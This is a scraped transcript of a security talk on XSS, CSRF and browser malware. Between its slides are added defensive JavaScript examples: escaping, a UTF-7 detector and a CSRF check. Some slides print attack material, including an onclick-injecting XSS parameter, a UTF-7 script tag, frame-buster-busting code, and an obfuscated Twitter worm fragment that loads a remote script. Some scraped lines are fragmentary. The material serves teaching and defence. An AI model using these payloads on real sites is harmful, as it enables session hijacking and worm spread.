When HTML Goes Bad

Upload: garyo

Post on 05-Apr-2018


  • 8/2/2019 When HTML Goes Bad

    1/22

    When HTML Goes Bad: Inside XSS, CSRF, and Malware...

    Mike Shema, Security Research Engineer, Qualys Inc.

  • 2/22

    When HTML Goes Bad

    XSS (HTML injection)

    CSRF (HTTP actuation)

    Malware (game over...)

  • 3/22

    Money

    Attacks refocus from web server to web browser via the web application

    Compromise the web application in order to use as a delivery mechanism

    Infect rather than deface

    Automated SQL injection attacks infected tens of thousands of web sites

  • 4/22

    Us and Them

    ...exploit the system to gain admin access
      Requires shell code
      Install keylogger, network sniffer, botnet
      Search for documents, credentials,

    ...exploit the browser
      No shell code required
      Access financial information
      Access e-mail
      Access social network

  • 5/22

    Poles Apart

    Desktop
      Access controls
      Process separation
      Anti-virus

    Browser
      Same Origin Policy
      Blocks pop-ups
      Cookies
      Tabs!
      Database (HTML5)

  • 6/22

    Safe Links?

    http://bit.ly/2z3MBj http://bit.ly/z18Rv

    http://bit.ly/OApJX


    http://bit.ly/lSxst http://bit.ly/wszWO

    http://bit.ly/A6Ca

    http://tinyurl.com/6q2ab9

  • 7/22

    Infection

  • 8/22

    Behind the Scenes

    http://website/page.cgi?user=Machine
    Welcome to the Machine...

    http://website/page.cgi?user=...
    Welcome to the ......

  • 9/22

    Behind the Scenes

    http://website/page.cgi?redirect=http://website/otherpage.html
    Welcome to the Machine link...

    http://website/page.cgi?redirect=+onclick=alert(echoes);a=
    Welcome to the Machine link...
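The two reflected parameters on the "Behind the Scenes" slides, rendered first the way the vulnerable page does it and then with context-aware output encoding. This is an added example, not code from the talk; the URL shapes follow the slides, and the function names, the escaping map and the redirect allow-list are constructed for illustration.

```javascript
// Added example (not from the slides): the two reflected parameters from the
// "Behind the Scenes" slides, rendered first the way the vulnerable page does
// and then with context-aware output encoding. The URL shapes follow the
// slides; everything else is constructed for illustration.

// Escape the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable: both values are concatenated straight into the markup and the
// href attribute is unquoted, so a value containing a space starts a new
// attribute. That is exactly what ?redirect=+onclick=alert(echoes);a= does.
function renderVulnerable(user, redirect) {
  return `<p>Welcome to the ${user}...</p>` +
         `<a href=${redirect}>link...</a>`;
}

// Allow-list for the redirect target: a same-site relative path only. This
// rejects scheme-relative //host, absolute URLs, whitespace and quotes rather
// than trying to enumerate every bad value (reject what is not known-good).
function isSafeRedirect(url) {
  return /^\/(?!\/)[\w\-.\/?=&%#]*$/.test(url);
}

// Hardened: every dynamic value is escaped for the context it lands in, the
// attribute is always quoted, and a rejected redirect falls back to "/".
function renderHardened(user, redirect) {
  const target = isSafeRedirect(redirect) ? redirect : '/';
  return `<p>Welcome to the ${escapeHtml(user)}...</p>` +
         `<a href="${escapeHtml(target)}">link...</a>`;
}

// Does the rendered markup carry an onclick attribute the page never wrote?
function hasOnclickAttribute(html) {
  return /\sonclick\s*=/i.test(html);
}
```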

  • 10/22

    So You Think You Can Tell...

    +ADw-script+AD4-


    orem psem .source

  • 11/22

    Careful With That AJAX, Eugene

    var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect","toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1","setRequestHeader", "Content-Type", "application/x-www-form-urlencoded",

    "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28",")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace","innerHTML", "documentElement", "exec", "Twitter should really fix this...Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this,regards Mikeyy", "random", "length", "floor", "mikeyy:)"

    %73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));

  • 12/22

    XSS

    Character encoding
      Valid, but unexpected
      Invalid but rendered

    Payload encoding
      JavaScript obfuscation
      Browser-specific quirk
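The "valid, but unexpected" character-encoding case from this slide and the +ADw-script+AD4- sequence on slide 10 are the same trick: UTF-7 shifted segments that a browser left to sniff the charset will read as angle brackets. This added example (not from the talk) decodes those segments and flags input that only becomes markup after the decode; the function names and sample inputs are constructed.

```javascript
// Added example (not from the slides): decoding the UTF-7 shifted sequences
// behind "+ADw-script+AD4-" and flagging input that only turns into markup
// after such a decode. Names and sample inputs here are constructed.

const B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

// Decode one shifted segment (the text between '+' and '-'): modified base64
// without padding, carrying UTF-16BE code units. Returns null on bad input.
function decodeUtf7Segment(seg) {
  let bits = 0, nbits = 0;
  const bytes = [];
  for (const ch of seg) {
    const v = B64.indexOf(ch);
    if (v < 0) return null;
    bits = (bits << 6) | v;
    nbits += 6;
    if (nbits >= 8) {
      nbits -= 8;
      bytes.push((bits >> nbits) & 0xff);
      bits &= (1 << nbits) - 1;            // keep only the leftover bits
    }
  }
  if (bytes.length % 2 !== 0) return null; // not whole UTF-16 code units
  let out = '';
  for (let i = 0; i < bytes.length; i += 2)
    out += String.fromCharCode((bytes[i] << 8) | bytes[i + 1]);
  return out;
}

// Decode a whole string the way a browser that has sniffed UTF-7 would see it.
// "+-" is the escape for a literal '+'; unparseable segments are left alone.
function decodeUtf7(s) {
  return s.replace(/\+([A-Za-z0-9+\/]*)-?/g, (match, seg) => {
    if (seg === '') return '+';
    const decoded = decodeUtf7Segment(seg);
    return decoded === null ? match : decoded;
  });
}

// Detection: the raw input has no angle brackets, but its UTF-7 reading does.
// The server-side fix is to always declare the charset in the response
// (Content-Type: text/html; charset=utf-8) so the browser never sniffs one.
function hidesMarkupInUtf7(input) {
  return !/[<>]/.test(input) && /[<>]/.test(decodeUtf7(input));
}
```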

  • 13/22

    Unusual Suspects

    Flash

    PDF

    Images


    Browser quirks

  • 14/22

    Where Are the Worms?

    MySpace (old, so very, very old)

    Twitter

    No large web app worm has been truly weaponized

  • 15/22

    CSRF

    Taking advantage of the design of HTML & HTTP

    Forcing state onto a non-stateful transport

    Forced workflows
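The defence against "forcing state onto a non-stateful transport" is to make the server demand proof that the request came from its own page, which a forged cross-site form cannot supply. This added example (not from the talk) shows such a check; the session store, the allowed origin, and the request shape (method, headers, cookies, body) are all constructed for illustration.

```javascript
// Added example (not from the slides): a server-side check that refuses to let
// a forged cross-site request "force state" onto a victim's session. Session
// store, origin, header and body shapes are all constructed for illustration.

const ALLOWED_ORIGIN = 'https://website.example';

// Constructed session store: cookie value -> per-session anti-CSRF token that
// was embedded in the legitimate form when it was rendered.
const SESSIONS = new Map([['sess-1', { csrfToken: 'tok-a1b2c3d4' }]]);

// Compare tokens without leaking where they differ.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers: {origin?, referer?}, cookies: {sid?}, body: {_csrf?} }
// Returns { ok, reason }; only state-changing methods are checked.
function checkCsrf(req) {
  if (!['POST', 'PUT', 'PATCH', 'DELETE'].includes(req.method)) {
    return { ok: true, reason: 'safe method' };
  }
  const session = SESSIONS.get(req.cookies.sid);
  if (!session) return { ok: false, reason: 'no session' };

  // Browsers attach the victim's cookie to a forged request, but they also
  // send Origin (or Referer) naming the page that made it; mismatch = reject.
  let origin = req.headers.origin;
  if (!origin && req.headers.referer) origin = new URL(req.headers.referer).origin;
  if (origin && origin !== ALLOWED_ORIGIN) return { ok: false, reason: 'cross-origin' };

  // The attacker's page cannot read the token out of the victim's form (Same
  // Origin Policy), so a forced request arrives without it or with a guess.
  const token = req.body._csrf;
  if (typeof token !== 'string' || !constantTimeEqual(token, session.csrfToken)) {
    return { ok: false, reason: 'bad token' };
  }
  return { ok: true, reason: 'ok' };
}
```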

  • 16/22

    Frame Busting

    if (top != self) { top.location.replace(self.location.href); }

    var prevent_bust = 0;
    window.onbeforeunload = function() { prevent_bust++ };
    setInterval(function() {
      if (prevent_bust > 0) {
        prevent_bust -= 2;
        '...204.com'
      }
    }, 1);

    http://www.codinghorror.com/blog/archives/001277.html

    http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed

  • 17/22

  • 18/22

    Bricks in the Wall

    Coding practices

    Frameworks

    Libraries

    Rectify vs. reject

    Inoculation

  • 19/22

    Another Brick in the Wall

    User base: xssed, ha.ckers.org

    Web application scanners

    Source code scanners

  • 20/22

    Browser Evolution

    Move more countermeasures into the browser

    Process isolation

    Anti-XSS

    Anti-CSRF

    Behavioral anti-virus

  • 21/22

    A New Machine

    HTML5

    Cross-document messaging a.k.a. Some Other Origins, Too

    Database

    Expanding the attack surface

    Increasing the information store

  • 22/22

    Thank You!

    During Live Presentation Please Use Your WebEx Q&A Panel to Submit Questions

    To Request a 14-day Free Trial of our Web Application Scanning Solution, email:

    [email protected]